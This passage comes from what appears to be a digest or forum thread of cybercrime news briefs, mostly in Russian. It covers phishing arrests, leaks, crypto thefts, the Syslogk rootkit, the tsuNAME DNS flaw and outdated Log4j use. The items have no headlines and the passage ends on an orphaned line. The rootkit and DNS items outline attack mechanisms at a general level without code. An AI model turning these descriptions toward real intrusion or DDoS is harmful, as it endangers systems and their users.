cards, as well as other various electronics used in operating the phishing
scam.
SIM boxes can hold more than 250 active cards and will typically send out up
to 150,000 messages per day containing phishing lures to various scams.
The items were seized to undergo further analysis.
Police will allege in court the man was responsible for sending more than 17
million scam text messages to Australians, pretending to be trusted companies
such as Australia Post and Linkt.
Commander of the Cybercrime Squad, Detective Acting Superintendent Jason Smith
said consumers must be weary of SMS phishing scams ahead of the Christmas
period.
“As we enter the final lead up to Christmas, a lot of people will be expecting
online deliveries; but under no circumstances should you ever click on a link
you receive in an SMS message or email,” Det. A/Supt. Smith said.
“Legitimate businesses will never call or SMS customers seeking confidential
information. Always be suspicious when you receive such requests.”
Scammers will often pretend to be from a reputable company or a financial
institution you may deal with regularly, so it is the safest option to deal
with them directly through their official website.
SMS phishing is one of the most common tactics scammers use to collect banking
information, with many of their victims being elderly people who may not be
aware of the risks surrounding fraudulent links.
Many scammers use calculated language or links or contact numbers which may
appear legitimate at first glance.
Det. A/Supt. Smith urged the public to remain vigilant as the Cybercrime Squad
was committed to “stamping out this type of crime”.
He also directed consumers not to click links you receive in texts or email
saying: “The scammers are powerless if you don’t play into their hands”.
Text messages from scammers may offer a direct link to pay for an outstanding
bill or may coerce someone to click a link which is said to contain a picture
of them, or an exposed piece of sensitive and personal information.
The man was taken to Liverpool Police Station and charged with using equipment
connected to network to commit serious offence.
He was granted conditional bail to appear before Liverpool Local Court on
January 17.
Source: skynews.com.au/australia-news/crime/39yearold-man-charged-for-alleged- sms-phishing-scam-operation-which-sent-more-than-17-million-fraudulent-text- messages-pretending-to-be-australian-companies/news- story/3c2eb49e2fd06a054bc81d5b54411159
Передача криптовалюты по наследству в России: что важно знать
Россияне уже могут легально оставлять цифровые активы наследникам. На какие моменты стоит обратить внимание, нужно ли платить налоги при вступлении в наследство и как обезопасить свои средства
С 2021 года в России вступил в силу закон «О цифровых финансовых активах», который определяет криптовалюту как имущество. Это позволяет на законных основаниях передать криптоактивы по наследству, однако пока в законе нет четкого механизма, который бы описывал этот процесс.
Шаг первый: защитить актив
Чтобы доступ к кошельку получил наследник, его учетные данные нужно
зафиксировать в отдельном документе. Для этого подойдет конструкция закрытого
завещания. Это запечатанный конверт, который хранится у нотариуса, и к его
содержимому никто, включая самого нотариуса, не имеет доступа.
Если криптоактивы находятся на бирже, то лучше вывести их на отдельный кошелек, поскольку торговые площадки обычно не определяют механизм передачи активов наследникам. На данный момент только Coinbase включила в свое пользовательское соглашение пункт о переходе прав на криптоактивы наследникам владельца в случае его смерти. Биржа Binance закрывает счет умершего и присваивает его средства себе, предупредил преподаватель Moscow Digital School Роман Янковский.
Шаг второй: безопасная передача
Технически передача прав на криптоактивы наследникам реализуется сложно и по-
разному в каждом отдельном случае. Чтобы обозначить этот механизм и
обезопасить активы, нужно заранее обратиться к цифровым юристам, которые имеют
подобный опыт работы. Однако сейчас количество таких специалистов в России
можно «пересчитать по пальцам одной руки», считает член Комиссии по правовому
обеспечению цифровой экономики Московского отделения Ассоциации юристов России
Юрий Брисов.
Для оформления передачи криптоимущества надо уметь его идентифицировать. Для этого нотариус должен иметь определенный уровень грамотности. Например, возможность пользоваться банковским счетом или совершать операции с ценными бумагами прекращается со смертью лица. И пока законный правопреемник не появится, банк, реестродержатель и биржа будут осуществлять технический надзор за исполнением закона.
При этом у нотариусов нет инструкций насчет того, как обеспечить прекращение пользования частным ключом (цифровым кошельком) или как совершить передачу цифровых прав, если в завещании указаны одни токены, а на момент открытия наследственного дела там будут другие токены.
Пока не будет разработано подробное методическое пособие по передаче цифровых прав, это право существует только на бумаге, говорит Брисов: де-факто эффективного механизма наследования цифровых прав в российском праве не существует.
Шаг третий: задекларировать доход
Вступая в наследство, его получатель должен обратиться в ФНС, чтобы
задекларировать доход. Необходимо предоставить информацию о происхождении
активов и доказать, что криптовалюта получена законным путем, предупредила
руководитель Российского центра компетенций и анализа стандартов ОЭСР РАНХиГС
Антонина Левашенко.
Брисов добавил, что из-за того, что с недавних пор криптовалюта считается в
России имуществом, при вступлении в наследство не нужно платить никаких
налогов. Решающим фактором будет именно фактическая передача доступа к
криптовалютному кошельку, на котором хранятся активы.
А юридически это будет соответствовать обычной процедуре наследования,
заключил Янковский.
Сотрудник сервиса VirusTotal (принадлежит Google) случайно выложил в открытый доступ на платформу файл с данными 5600 зарегистрированных корпоративных клиентов (ФИО, адреса электронной почты и название ведомства или компании), в том числе сотрудников спецслужб США и Великобритании, включая контакты экспертов по ИБ из Киберкомандования США, Пентагона, Минюста, ФБР и АНБ.
Google почти сразу оказалась в курсе ситуации. В компании
[пояснили](https://therecord.media/virustotal-user-email-addresses-leaked-
google-military-intelligence), что в открытый доступ действительно
непреднамеренно попал файл размером 313 КБ с небольшим количеством контактных
данных администраторов групп некоторых крупных клиентов сервиса VirusTotal.
«Специалисты платформы закрыли доступ к этому файлу в течение часа после его публикации. Компания оперативно пересмотрела внутренние процессы и внедрила технические средства контроля по недопущению аналогичных нештатных ситуаций в будущем», — пояснил представитель Google.
Журналисты выяснили, что в файле содержались данные не только профильных экспертов по ИБ спецслужб США, но и контакты специалистов из госучреждений Великобритании (Минобороны, CERT-UK, Центра правительственной связи страны (GCHQ), NCSC, британское управление по снятию с эксплуатации ядерных объектов (NDA), аппарата Кабинета министров, пенсионного фонда), а также ряда министерств и ведомств Германии (Федеральной полиции, Федерального управления уголовной полиции и Службы военной контрразведки), Японии, Объединённых Арабских Эмиратов, Катара, Литвы, Израиля, Турции, Франции, Эстонии, Польши, Саудовской Аравии, Колумбии, Чехии, Египта, Словакии. Судя по группировке аккаунтов по корпоративным клиентам, некоторые из сотрудников учреждений и ведомств использовали личные адреса на Gmail, Hotmail и Yahoo.
Помимо госведомств и спецслужб разных стран в файле с утечкой были данные сотрудников Deutsche Bahn (основной железнодорожный оператор Германии), Bundesbank, BMW, Mercedes-Benz и Deutsche Telekom.
Google предупредила клиентов об утечке данных их сотрудников и посоветовала им срочно провести информирование персонала о рисках, связанных с фишингом.
Полиция Южной Кореи совместно с крупнейшей биржей Binance разрабатывает систему, которая должна обеспечить быстрый доступ к адресам кошельков и замораживать средства, связанные с уголовными расследованиями.
Национальное полицейское управление Южной Кореи во вторник, 30 мая, собирает для обсуждения своих планов представителей Binance и ведущих местных криптовалютных бирж — Upbit, Bithumb, Coinone, Korbit и Gopax. Правоохранители хотят уметь мониторить адреса кошельков в режиме реального времени.
Binance, владеющая контрольным пакетом акций южнокорейской криптобиржи Gopax, уже вызвалась стать главным партнером корейских властей. У крупнейшей в мире криптовалютной биржи есть собственная команда, которая отслеживает и сообщает о злоумышленниках в правоохранительные органы. Фактически, Binance обучала многие государственные учреждения борьбе с криптовалютными преступлениями.
В конце 2022 года стало известно, что южнокорейская полиция и прокуратура увеличили за год в четыре раза траты на инструменты для слежки за криптоактивами. Увеличение расходов на отслеживание криптовалют связано с тем, что полиция по всей стране начала формировать специализированные подразделения криптонадзора. Подразделения используют инструменты для отслеживания транзакций и IP-адресов пользователей.
В прошлом году Комиссия по финансовым услугам Южной Кореи (FSC) заявляла, что собирается контролировать транзакции инвесторов с криптоактивами объемом более 100 млн вон ($70 000).
Народный суд города Шанжао провинции Гуанси вынес обвинительный приговор хакеру, который похитил свыше 383 ETH с телефона жертвы при помощи трояна. Об этом сообщают местные СМИ.
Согласно материалам дела, весной 2018 года подсудимый при помощи трояна получил доступ к кошельку imToken на телефоне пострадавшего. В течение марта- апреля он произвел более 520 выводов средств на общую сумму 383,6 ETH. В дальнейшем эти монеты злоумышленник обменял на 109 458 USDT.
После задержания хакера полиция вернула все похищенные активы пострадавшему.
Суд приговорил злоумышленника к 10 годам и шести месяцам тюремного заключения, а также штрафу в размере 200 000 юаней (свыше $28 000)
Злоумышленники используют функцию волшебных пакетов в технологии Wake-on-LAN для запуска спящего бэкдора на устройстве.
Новый руткит Syslogk быстро развивается и уже был замечен в дикой природе. Основой вредоноса стал Adore-ng , старый руткит с открытым исходным кодом.
Syslogk может принудительно загружать себя в модули ядра Linux, чтобы запустить бэкдор Rekoobe. Руткит невозможно обнаружить вручную, так как при первом запуске в качестве модуля ядра Syslogk удаляет свою запись из списка установленных модулей.
Обнаружить бэкдор не легче, так как он находится в спящем режиме, пока не получит волшебный пакет от злоумышленника. Волшебный пакет (magic packet) работает как стандартный кадр пробуждения, нацеленный на определенный сетевой интерфейс. Он позволяет получить удаленный доступ к компьютеру даже в режиме энергосбережения. Получив соответствующий волшебный пакет, Syslogk может запустить или остановить бэкдор в зависимости от полученной инструкции.
Согласно [заявлению](https://decoded.avast.io/davidalvarez/linux-threat- hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/) компании Avast , Syslogk работает еще эффективнее в связке с поддельным SMTP-сервером. Специалисты считают руткит крайне опасным, так как его невозможно обнаружить в памяти или на диске до получения волшебного пакета от злоумышленника.
Ранее сообщалось про другую вредоносную программу, использующую скрытый бэкдор – BFDoor. Она позволяет злоумышленнику удаленно подключиться к оболочке Linux и получить полный доступ к скомпрометированному устройству.
В Крыму задержали хакера, атаковавшего сайты российских СМИ по заказу Украины.
Сотрудники ФСБ задержали жителя Ялты, который причастен к хакерским атакам на сайты российских информационных структур. Об этом сообщает пресс-служба УФСБ России по Республике Крым и Севастополю.
Как сообщается, 29-летний ялтинец работал системным администратором в одной из местных компаний. В его распоряжении были права администратора и некоторые базы данных. Мужчина установил на свой рабочий компьютер программу для хакерских атак.
Фигурант расследования с 24 февраля по 10 марта текущего года производил компьютерные атаки на порталы российских средств массовой информации (СМИ). Кроме того, атаки велись на сайты банков.
Правоохранители уточняют, что мужчина причастен к атакам на сайт Сбербанка, РБК, Интерфакса, Ленты.ру, РИА Новости и Российской газеты.
Задержанному грозит 5 лет лишения свободы.
Один из крупнейших магистральных провайдеров, американская Cogent Communications, приступил к отключению российских операторов и компании от своих сетей, передаёт «Коммерсант». С Cogent работают «Ростелеком», «Вымпелком», «МегаФон», «Яндекс» и VK. Американская компания предлагает им забрать своё сетевое и серверное оборудование в течение месяца.
В своём сообщении к российским операторам американский магистральный провайдер отметил, что начнёт отключать российское сетевое оборудование 4 марта с 20:00 по московскому времени. В соответствующем письме к российским партнёрам американская компания также сообщила, что в течение 30 дней оставит в своих серверных стойках российское оборудование, чтобы указанные компании могли его забрать.
«После окончания этого срока оборудование будет отключено и отправлено на хранение. Доступа к серверам после прекращения обслуживания не будет» , — говорится в сообщении американской стороны.
Источники «Коммерсанта» сообщили, что с Cogent в России работают «Вымпелком», «МегаФон», «Ростелеком», МТС, Tele2 и VK. Однако в Tele2 опровергли сотрудничество с Cogent. В МТС отметили, что прекратили работу с этой компанией ещё в 2013 году по коммерческим соображениям. В «Ростелекоме» сказали, что «изучают ситуацию». В «Яндексе» сообщили, что не получали уведомления, но действительно имеют подключение к сетям Cogent. В «Вымпелкоме», «МегаФоне» и «ТрансТелекоме» (ТТК) отказались от комментариев. В VK и самой Cogent не ответили на запросы российского издания.
Отказ Cogent от работы с российскими провайдерами приведёт к деградации связности российского сегмента интернета с мировым. Примеру Cogent могут последовать и другие зарубежные магистральные провайдеры, пишет российское издание.
«Любое отключение магистрального провайдера может закончиться замедлением или недоступностью иностранных интернет-сервисов из российской части сети на неопределённый срок» , — прокомментировал профессор EMBA «Сколково» Евгений Черешнев в разговоре с «Коммерсантом».
По его словам, ситуацию можно сравнить с перекрытием шлюзов в сложной системе подачи питьевой воды, где закрытие магистральных «труб» можно компенсировать другими каналами. Однако делать это бесконечно не получится.
В этом случае проблемы с доступом в первую очередь будут у сервисов, которые не имеют центров обработки данных в России. Помимо [заблокированной с 4 марта социальной сети Facebook](https://3dnews.ru/1061388/roskomnadzor-zablokiroval- sotsset-facebook-v-rossii), к таким компаниям относятся Google, Airbnb, Netflix и другие. Череншев добавил, что последствия пока сложно спрогнозировать, поскольку таких прецедентов и в таких масштабах ещё не было.
Очередная неприятная история произошла с участием мошенников, выуживающих данные о кредитных картах белорусов через интернет-площадки. По сходной схеме им удалось обмануть двоих белорусов, один из которых потерял около 15 тысяч рублей, второй — 3 тысячи долларов и 2 тысячи евро.
С одним из мужчин (оба проживают в Орше), который продавал мебель, связался «покупатель», якобы заинтересовавшийся тумбой, а чтобы общаться было удобнее, перевел беседу в мессенджер. Продавец согласился получить оплату на карту, после чего «покупатель» дал ему ссылку, где нужно было ввести данные банковского пластика.
Дизайном ресурс напоминал сайт, на котором было размещено объявление, поэтому никаких опасений не вызвал, сообщается на сайте МВД. Продавец заполнил поля и нажал кнопку «получить средства», после чего система предложила ввести данные карты, включая CVV-код на обороте, что он и сделал. Сразу после этого с карты списалось 100 рублей.
Продавец обратился в «техподдержку», где ему списание объяснили сбоем и обещали вернуть. Но для этого на карте якобы должно быть столько же денег, сколько должны вернуть. Оршанец пополнил карту и стал ждать, но сумма списалась вновь.
Не желая терять 200 рублей, он решил следовать дальнейшим указаниями «техподдержки». Ранее, опасаясь за сохранность денег, в настройках своей валютной карты он отключил возможность оплаты через интернет, однако передал всю необходимую информацию мошенникам (в том числе коды из SMS и персональные данные). «Покупатель» тумбы в итоге получил доступ к счету жертвы и перевел деньги, после чего приобрел на них криптовалюту.
Аналогичную схему «развода» использовали и со вторым оршанцем.
Специалисты подготовят страну к возможной атаке российских хакеров;
Группа специалистов по кибербезопасности из США и Великобритании отправилась
на Украину, пишет The New York Times.
По версии издания, специалисты должны подготовить страну к возможной атаке
российских хакеров.
Эксперты по кибербезопасности должны помогут усилить защиту электросетей,
банковской системы и других важных объектов экономики и правительства Украины.
Отметим, что российская сторона уже неоднократно отвергала бездоказательные
обвинения западных стран в кибератаках. Кроме того, Москва неоднократно
выражала свою готовность к сотрудничеству по вопросам кибербезопасности.
source: nytimes.com/2021/12/20/us/politics/russia-ukraine-cyberattacks.html
Сфера здравоохранения оказалась одной из отраслей, наиболее пострадавших от атак с использованием вымогательского ПО.
Специалисты американской юридической фирмы BakerHostetler в своем ежегодном отчете Data Security Incident Response Report рассказали об инцидентах прошлого года, связанных с программами-вымогателями. Сфера здравоохранения оказалась одной из отраслей, наиболее пострадавших от атак с использованием вымогательского ПО, уступая только сфере образования. В среднем киберпреступники требовали выкуп в размере $4 583 090.
«В 2019 году резко возросло количество программ-вымогателей, а основная тактика их операторов заключалась в шифровании как можно большего количества устройств в сети жертвы. Затем в конце 2019 года группировка Maze изменила тактику и начала похищать данные перед их шифрованием», — отметили эксперты.
Это позволило оказывать дополнительное давление на компании, заставляя жертв платить выкуп даже после восстановления данных с помощью резервных копий.
В то время, когда ресурсы системы здравоохранения были истощены из-за пандемии коронавирусной инфекции (COVID-19), программы-вымогатели нанесли серьезный ущерб. Хотя министерство здравоохранения и социальных служб США, Федеральное бюро расследований и другие руководители служб безопасности советуют не выплачивать выкуп, некоторые организации выполняют требования преступников.
В сфере здравоохранения средняя сумма выкупа составляла $910 335 в 2020 году. Однако сам выкуп — не единственная причина денежных расходов, с которой столкнулись компании. По словам специалистов, средняя стоимость анализа систем IT-специалистами составила $58 963.
Как отметили исследователи, в каждом инциденте, связанном с вымогателями, присутствовало одно или несколько обстоятельств: отсутствие обнаружения взлома на оконечных точках, неэффективная реализация резервного копирования или открытый протокол удаленного рабочего стола.
Если зарегистрировать достаточное количество рекурсивных DNS-серверов, можно осуществлять DDoS-атаки на авторитативные DNS-серверы.
Группа исследователей сообщила об уязвимости в экосистеме DNS, позволяющих усиливать трафик, идущий к авторитативным DNS-серверам, и осуществлять на эти серверы DDoS-атаки.
Уязвимость, получившая название tsuNAME, была обнаружена, когда новозеландские и голландские национальные регистраторы домена (.nz и .nl) зафиксировали аномалии в DNS-трафике, проходящем через их авторитативные серверы.
Для того чтобы понимать, как работает уязвимость, нужно знать разницу между авторитативным и рекурсивным DNS-сервером. В настоящее время большинство серверов в Сети являются рекурсивными – они переадресовывают DNS-запросы пользователей на авторитативные DNS-серверы, играющие роль своеобразной телефонной книги и возвращающие DNS-ответы для конкретных доменных имен. В нормальных условиях миллионы рекурсивных DNS-серверов ежедневно отправляют миллиарды DNS-запросов авторитативным DNS-серверам.
Авторитативные DNS-серверы обычно управляются крупными компаниями и организациями наподобие сетей доставки контента, техногигантов, интернет- провайдеров, регистраторов домена и правительственных организаций.
Как пояснили исследователи, злоумышленник может создавать вредоносные DNS- запросы, эксплуатирующие уязвимости в ПО рекурсивного DNS-сервера, чтобы отправлять на авторитативные DNS-серверы вредоносные запросы в непрерывном цикле. Если злоумышленник зарегистрирует достаточное количество рекурсивных DNS-серверов, он сможет осуществлять достаточно мощные DDoS-атаки на авторитативные DNS-серверы.
Отчет (.pdf):
Специалисты Group-IB обнаружили масштабную мошенническую кампанию, за которой стоит хак-группа DarkPath Scammers. Злоумышленники создали распределенную сеть из 134 мошеннических сайтов, имитирующих Всемирную организацию здравоохранения (ВОЗ). Преступники обещали посетителям вознаграждение за прохождение фейкового опроса, посвященного Дню осведомленности о здоровье. Вместо обещанных 200 евро пользователей перенаправляли на сайты знакомств, платных подписок и мошеннические ресурсы.
Еще в начале апреля Международный вычислительный центр ООН (UNICC) оповестил экспертов о фиктивном сайте, использующем имя Всемирной организации здравоохранения. Там пользователям предлагали ответить на несколько простых вопросов и заработать 200 евро по случаю Всемирного дня здоровья, который ежегодно проводится 7 апреля под эгидой ВОЗ.
Фальшивый опросник
После ответа на несложные вопросы пользователю предлагали поделиться ссылкой на опрос с друзьями и коллегами по базе контактов в WhatsApp: таким образом мошенники старались масштабировать свою схему.
Исследователи выяснили, что, когда жертва нажимала на кнопку «Поделиться», вместо обещанного вознаграждения ее перенаправляли на сторонние мошеннические ресурсы, где предлагали принять участие в другом розыгрыше, установить расширение для браузера или подписаться на платные услуги. В худшем случае пользователи могли оказаться на вредоносном или фишинговом ресурсах.
Особенностью данной схемы был индивидуальный подход к каждой жертве: контент, который видели пользователи, менялся в зависимости от местоположения, user agent и настроек языка. Например, валюта денежного вознаграждения менялась в зависимости от локации пользователя.
Расследуя этот инцидент, аналитики Group-IB обнаружили сложную распределенную мошенническую инфраструктуру, включавшую в себя сеть из 134 практически идентичных связанных домена, на которых были размещены страницы, связанные со Всемирным днем здоровья. Group-IB добилась блокировки этих доменов через 48 часов после их обнаружения, и мошенники перестали использовать бренд ВОЗ.

Дальнейшее исследование показало, что все эти выявленные и заблокированные домены являлись частью более крупной сетки, которая контролировалась хак- группой DarkPath Scammers. Фальшивые ресурсы, имитирующие ВОЗ, были связаны как минимум с 500 другими мошенническими и фишинговыми ресурсами, имитирующими более 50 известных международных брендов пищевой промышленности, спортивной экипировки, электронной коммерции, программного обеспечения, энергетики и автоиндустрии.
Анализ этих сайтов показал, что преступники используют специальные наборы инструментов (подобные фишинговым наборам) для создания и разработки фейковых страниц. Один такой набор позволяет имитировать одновременно несколько брендов с использованием одного шаблона. Также на большинстве доменов с фишинговым и мошенническим контентом используются сети доставки содержимого (CDN, Content Delivery Network) для сокрытия IP-адресов настоящих серверов.
Интересно, что большинство мошеннических сайтов, контролируемых DarkPath Scammers, по-прежнему активны и нацелены на миллионы пользователей по всему миру. Мошенники рекламируют свои ресурсы с помощью почтовых рассылок, платной рекламы и социальных сетей. По оценке Group-IB, в день сеть мошенников привлекает около 200 000 пользователей из США, Индии, России и других регионов мира.

Источник: xakep.ru/2021/05/04/darkpath-scammers-who/
Бывший член Национальной гвардии ВВС США Джек Тейшейра приговорён к 15 годам тюремного заключения за кражу и разглашение секретной военной информации через платформу Discord.
22-летний сотрудник 102-го разведывательного крыла на базе Оттис в Массачусетсе, поступил на службу в сентябре 2019 года. В течение первых лет своей карьеры он занимался киберзащитой, но позднее начал просматривать материалы, к которым не имел доступа по уровню допуска. Впоследствии Тейшейра начал публиковать эти данные в интернете, в том числе в Discord, где был активным участником игровых чатов.
Среди опубликованной информации были планы США и НАТО, данные о сотрудниках Великобритании и США, задействованных в военных операциях, а также сведения о китайской программе беспилотников. Прокуроры отметили, что действия Тейшейры нанесли «исключительно серьёзный ущерб» национальной безопасности США. В судебных документах подчёркивалось, что Тейшейра публиковал секретные данные, чтобы произвести впечатление на своих интернет-друзей и потешить своё самолюбие.
Следствие установило, что сначала Тейшейра переписывал секретные данные вручную, а затем перешёл к печати документов на редко используемом принтере. В свободное от службы время он администрировал свой сервер в Discord с примерно 25 участниками, где обсуждались темы массовых расправ и политических преступлений.
Несмотря на осознание незаконности своих действий и регулярное обучение в ведомстве правилам работы с секретной информацией, Тейшейра продолжал выкладывать данные в интернет. Утечка информации привлекла внимание широкой общественности, когда документы начали распространяться за пределами Discord — сначала на других серверах, затем на 4chan и других платформах. В некоторых файлах данные были намеренно искажены, что только усугубило ситуацию.
После того как утечка попала в СМИ, Тейшейра пытался замести следы: призвал участников чата удалить все материалы, а затем удалил свой аккаунт и уничтожил жёсткие диски, которые позже были найдены в мусорном баке возле его дома. Арест произошёл в апреле 2023 года после того, как Discord передал адрес Тейшейры следственным органам.
Тейшейра признал свою вину в шести эпизодах незаконного хранения и передачи секретной информации, касающейся нацбезопасности. Федеральный суд в Бостоне приговорил Тейшейру к 15 годам лишения свободы и 3 годам условного наказания. Директор ФБР Кристофер Рэй заявил, что приговор должен стать предостережением для всех, кто обладает доступом к секретной информации: «предательство доверия повлечёт за собой серьёзные последствия».
regmedia.co.uk/2024/11/12/teixeira.pdf
justice[.]gov/opa/pr/former-air-national-guardsman-sentenced-15-years-prison-
unlawfully-disclosing-classified
https://thecyberwire.com/podcasts/microsoft-threat-intelligence/25/notes
On this week's episode of The Microsoft Threat Intelligence Podcast, we discuss the collaborative effort between Microsoft and Fortra to combat the illegal use of cracked Cobalt Strike software, which is commonly employed in ransomware attacks. To break down the situation, our host, Sherrod DeGrippo, is joined by Richard Boscovich, Assistant General Counsel at Microsoft, Jason Lyons, Principal Investigator with the DCU, and Bob Erdman, Associate VP Research and Development at Fortra. The discussion covers the creative use of DMCA notifications tailored by geographic region to combat cybercrime globally. The group express their optimism about applying these successful techniques to other areas, such as phishing kits, and highlight ongoing efforts to make Cobalt Strike harder to abuse.
Ваши эмодзи могут стать вашим приговором.
На Петербургском международном юридическом форуме (ПМЮФ) обсуждалась возможность признания некоторых эмодзи экстремистским контентом. С инициативой выступила Элина Сидоренко, член Совета по развитию гражданского общества и правам человека при президенте России, а также руководитель АНО «Белый интернет».
Сидоренко отметила, что в рамках белого интернета уже началось обсуждение вопроса регулирования правового статуса эмодзи. Беларусь стала первой страной, которая официально признала некоторые эмодзи экстремистским контентом. Несмотря на то, что в России к этому шагу пока не подошли, Сидоренко подчеркнула, что основания для подобных мер существуют. Правозащитница провела параллель между эмодзи и репостами, отметив, что общественная опасность последних уже признана. Она подчеркнула, что ситуация с эмодзи аналогична, намекая на потенциальную угрозу, которую могут нести в себе эти картинки.
Элина Сидоренко уточнила, что речь идет не о лайках и дизлайках, которые суды уже иногда признают юридически значимыми действиями, а о «картинках, которые могут носить радикальный характер». Правозащитница считает, что за такие изображения необходимо предусмотреть юридическую ответственность.
Она также отметила, что экстремистский контент зачастую носит пограничный характер, и языковые модели не всегда помогают его выявить. По ее словам, это создает ситуацию, когда контент можно охарактеризовать как «плохой, но легальный». Именно в этом сегменте, по мнению Сидоренко, формируется основная система пропаганды и происходит виктимизация молодежи.
fontanka.ru/2024/06/26/73758227
В Пензенской области полицейские пресекли работу типографии, подделывавший доллары. Всего было изъято 1777 фальшивок на сумму почти в 180 тысяч долларов.
Полиция задержала владельца типографии - 45-летнего уроженца Армянской ССР, живущего в Саратовской области. На допросах он признался, что в феврале-июле 2023-го печатал фальшивки с использованием клише и высококачественного сырья. Речь идет о мини-типографии широкого профиля, печатавшей рекламную продукцию. Поддельные доллары он планировал продавать на черном рынке.
У задержанного была судимость за причинение тяжкого вреда здоровью. Газета утверждает, что раньше он «был вхож в криминальные круги Саратовской области».
Фальшивые доллары в России продают через закрытые паблики в разных соцсетях или «по криминальным каналам связи». По информации газеты, самыми подделываемыми в РФ купюрами остаются стодолларовые, пятитысячные и тысячные банкноты.
В числе потенциальных жертв мошенников - пожилые люди, бизнесмены, уходящие от налогов и сотрудничающие с «обнальщиками», а также люди, продающие дорогие вещи на сайтах объявлений.
Финансовый эксперт Наталья Жукова подчеркнула, что фальшивомонетничество несет в себе и угрозу инфляции.
«Когда в обращении появляются фальшивые деньги, увеличивается денежная масса, что может привести к инфляции. <…> Если люди начинают сомневаться в подлинности денег, они могут отказаться от использования национальной валюты, что приведет к ее обесцениванию»
Click to expand...
Представители криптовалютной биржи Four Dragons из Кыргызстана, пострадавшей от взлома в конце февраля, раскрыли ForkLog некоторые детали расследования инцидента.
По их словам, неизвестные похитили USDT с горячего кошелька платформы в момент совершения крупной операции. Назвать сумму ущерба в Four Dragons отказались, ссылаясь на тайну следствия.
Ранее сторонние эксперты оценивали ущерб в диапазоне от $841 000 до $100 млн. Тем не менее источник на бирже заявил, что максимальная оценка ущерба завышена.
В ходе внутреннего расследования команде удалось восстановить цепочку движения средств. Вначале вся сумма в USDT поступила на один адрес. В дальнейшем ее разбили на несколько частей и распределили по разным адресам.
Представители Four Dragons заявили, что обратились в Tether Limited с просьбой заморозить средства, но поддержка компании «саботировала обращения по формальным причинам».
«Злоумышленники начали переводить средства в другие криптовалюты. Небольшая часть ушла на платформы HTX, SWFT.pro и другие. Большую часть мошенники отправили на биржу WhiteBit», — заявил источник.
Он подчеркнул, что именно благодаря содействию WhiteBit удалось отследить последующее движение средств.
После этого активы через транзитные биткоин-кошельки начали переводиться на биржу KuCoin. Именно на ней, по словам Four Dragons, оказалась большая часть похищенных средств. Всего злоумышленники осуществили более 60 транзакций.
Схема перемещения похищенных средств. Данные: Four Dragons.
В расследовании инцидента участвует компания Match Systems. Four Dragons предприняла шаги по маркировке отслеженных средств как украденных через все основные блокчейн-анализаторы, включая Coinfirm, Chainanlysis, Crystal Blockchain и Scorechain.
Маркировка похищенных средств. Данные: Four Dragons.
«KuCoin не оказала какого-либо содействия в замораживании или хотя бы дальнейшем отслеживании средств, невзирая на то, что они уже были отмаркированы как украденные на момент перечисления их на кошельки в кластере KuCoin», — заявили представители Four Dragons.
Они обратились за комментарием к KuCoin, поскольку, по их словам, «ситуация выглядит как минимум странно».
В свою очередь ForkLog также отправил бирже информационный запрос, но пока не получил ответ.
Сейчас Four Dragons продолжает расследование совместно с киберполицией Кыргызстана. Они обещают вознаграждение 10% от возвращенной суммы каждому, кто поможет в поиске украденных средств на условиях анонимности.
Параллельно команда платформы ведет переговоры с продюсерами о съемках документального фильма о поисках украденных средств.
Напомним, в июле 2023 года биржа Four Dragons получила лицензию на право осуществления деятельности оператора обмена виртуальных активов от Финнадзора Кыргызстана.
22 февраля неизвестный взломал платформу. Несмотря на это биржа продолжила операционную деятельность.
Множество приложений, использующих библиотеку Apache Log4j, используют версии, уязвимые перед различными проблемам, включая нашумевшую уязвимость Log4Shell (CVE-2021-44228), хотя с момента ее обнаружении и исправления прошло уже больше двух лет.
Напомним, что в середине декабря 2021 года разработчики Apache Software Foundation выпустили экстренное обновление безопасности, исправляющее 0-day- уязвимость (CVE-2021-44228) в популярной библиотеке журналирования Log4j, входящей в состав Apache Logging Project. Срочность объяснялась тем, что ИБ‑специалисты уже начали публиковать в открытом доступе PoC-эксплоиты, объясняя, что использовать баг можно было удаленно, причем для этого не требовались особые технические навыки.
Проблема была назвала Log4Shell и, разумеется, атаки на нее не заставили себя ждать. Вскоре уязвимость стала одной из наиболее используемых хакерами, ведь злоумышленники начали искать в интернете любые Java-приложения, которые могли использовать библиотеку Log4j, и тестировали на них эксплоиты.
К проблеме Log4Shell было привлечено много внимания, так как ее широкий охват и простота использования заинтересовали множество злоумышленников. Однако теперь аналитики [Veracode](https://www.veracode.com/blog/research/state- log4j-vulnerabilities-how-much-did-log4shell-change) пишут, что обширная кампания по уведомлению сопровождающих затронутых проектов и системных администраторов оказалось не слишком успешной.
Дело в том, что, согласно собранным в период с 15 августа по 15 ноября данным, проектов с уязвимыми версиями Log4j все еще остается очень много. Так, специалисты Veracode собрали данные за 90 дней от 3 866 организаций, которые используют 38 278 приложений, зависящих от Log4j с версий от 1.1 до 3.0.0-alpha1.
Из этих приложений 2,8% используют Log4J версий от 2.0-beta9 до 2.15.0, которые напрямую уязвимы для Log4Shell.
Еще 3,8% используют Log4j 2.17.0, которая не уязвима для Log4Shell, но подвержена RCE-проблеме CVE-2021-44832, которая была исправлена в версии 2.17.1.
Наконец, 32% используют Log4j версии 1.2.x, поддержка которой завершилась еще в августе 2015 года. Эти версии уязвимы ко множеству серьезных проблем, включая такие баги, как CVE-2022-23307, CVE-2022-23305 и CVE-2022-23302.
В общей сложности Veracode обнаружила, что около 38% приложений используют небезопасные версии Log4j.
Постоянное использование устаревших версий библиотек свидетельствует о наличии системной проблемы, которую в Veracode объясняют желанием разработчиков избежать ненужных сложностей.
Так, по данным исследователей, 79% разработчиков предпочитают вообще не обновлять сторонние библиотеки после их первоначального включения в кодовую базу, чтобы не нарушить функциональность. При этом в 65% случаев обновления опенсорсных библиотек содержат лишь незначительные изменения и исправления, которые вряд ли могут привести к функциональным проблемам.
Более того, исследование показало, что на устранение уязвимостей высокой степени серьезности у 50% проектов уходит более 65 дней. При этом потребуется в 13,7 раз больше времени, чтобы исправить хотя бы половину бэклога в случае нехватки персонала, и более семи месяцев, в случае недостаточной информированности.
В Испании задержан Оскар Санчес Хиль, руководитель отдела по борьбе с экономическими преступлениями Национальной полиции Мадрида. Его обвиняют в связях с наркокартелем, торговле наркотиками и отмывании денег.
— При обыске в его доме в пригороде Мадрида следователи обнаружили более 20 миллионов евро, спрятанных за стеной, и еще около миллиона евро в его кабинете. По версии следствия, эти средства получены от незаконной деятельности.
theguardian.com/world/2024/nov/12/spanish-police-arrest-ex-fraud-chief- after-20m-found-in-walls-of-his-house
За работу обещают 100 тысяч рублей.
